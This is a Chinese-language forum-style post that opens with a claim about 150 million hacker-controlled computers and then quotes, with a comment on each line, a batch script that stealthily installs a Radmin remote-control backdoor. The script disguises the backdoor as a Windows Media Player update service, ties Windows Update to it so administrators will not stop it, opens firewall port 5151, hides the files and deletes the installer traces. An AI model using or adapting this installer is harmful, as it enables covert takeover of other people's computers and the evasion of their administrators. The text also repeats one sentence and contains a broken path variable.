刚在中国安全网上看到一条消息全球大约1.5亿台电脑在HK控制下
无论是控制的程度有多大 数目是惊人的,下面就引用下这个号称打造完美远程控
制的Radmin程序的批处理安装文件: (看过之后记得要检查下下你的宝贝电脑^^)
无论是控制的程度有多大 数目是惊人的,下面就引用下这个号称打造完美远程控
制的Radmin程序的批处理安装文件: (看过之后记得要检查下下你的宝贝电脑^^)
@echo off
@sc stop r_server
‘假如已经被装过R_server服务,先用SC将它停掉。
@sc delete r_server
‘将已经装过R_server服务删除。
@regedit /s server.reg
@SC create MPservice BinPath= "%systemroot%\system32\drivers\Update.exe /service" type=
own type= interact start= auto DisplayName= "Media Player of Remote Control Driver
Update"
‘这句是用SC建立一个服务,服务名为Mpservice,路径Binpath为"%systemroot%\system32
\drivers\Update.exe /service",类型type为 own 与interact交互,启动类型start为自动,
显示名DisplayName为"Media Player of Remote Control Driver Update"。
@sc description MPservice "为Windows Media Player提供加载进程及驱动程序、
库提供基层更新安全补丁的服务。"
‘这句是将MPservice服务的描述改为“为Windows Media Player提供加载进程及驱动程序、
库提供基层更新安全补丁的服务。”
@sc config wuauserv depend= MPservice
‘配置MPservice使wuauserv服务依存此服务(wuauserv可以根据自己喜欢改成其它服务,这里的
wuauserv是系统在Windows Update
网站的自动更新服务)。这里的目的是迷惑管理员,使其不敢轻易停止我们生成的Radmin服务。
@echo Windows Registry Editor Version 5.00 > %systemroot%\system32
\drivers\DisFirewall.reg
@echo
>> %systemroot%\system32\drivers\DisFirewall.reg
‘这里添加成的一个DisFirewall.reg注册表文件,在对方是XP SP2系统的情况下
将起到很大重要,由于SP2自带的防火墙配置信息是存
放于注册表中的,所有完全可以通过写入自己想要的信息使你的R_server可以接受
外界的连接。
@echo "5151:TCP"="5151:TCP:*:Enabled:Windows Update Services">> stemroot%\system32
\drivers\DisFirewall.reg
‘这句是允许外部连接5151的TCP端口,设置防火墙此规则名为Windows Update Services。
@regedit /s %systemroot%\system32\drivers\DisFirewall.reg
@attrib +h +r %systemroot%\system32\drivers\Update.exe
@attrib +h +r %systemroot%\system32\drivers\admdll.dll
@attrib +h +r %systemroot%\system32\drivers\raddrv.dll
‘以上三句是设置服务端三个文件为隐藏、只读属性。
@sc start MPservice
@del /q /f /s %systemroot%\system32\drivers\server.reg
@del /q /f /s %systemroot%\system32\drivers\Update.vbs
@del /q /f /s %systemroot%\system32\drivers\Update.bat
@del /q /f /s %systemroot%\system32\drivers\sc.exe
@del /q /f /s %systemroot%\system32\drivers\DisFirewall.reg
‘以上是清理生成出来的杂物,加参数/q是以安静模式删除,不要求确认,
参数/f是强制删除只读文件,参数/s是从所有子目录删除指定文件。
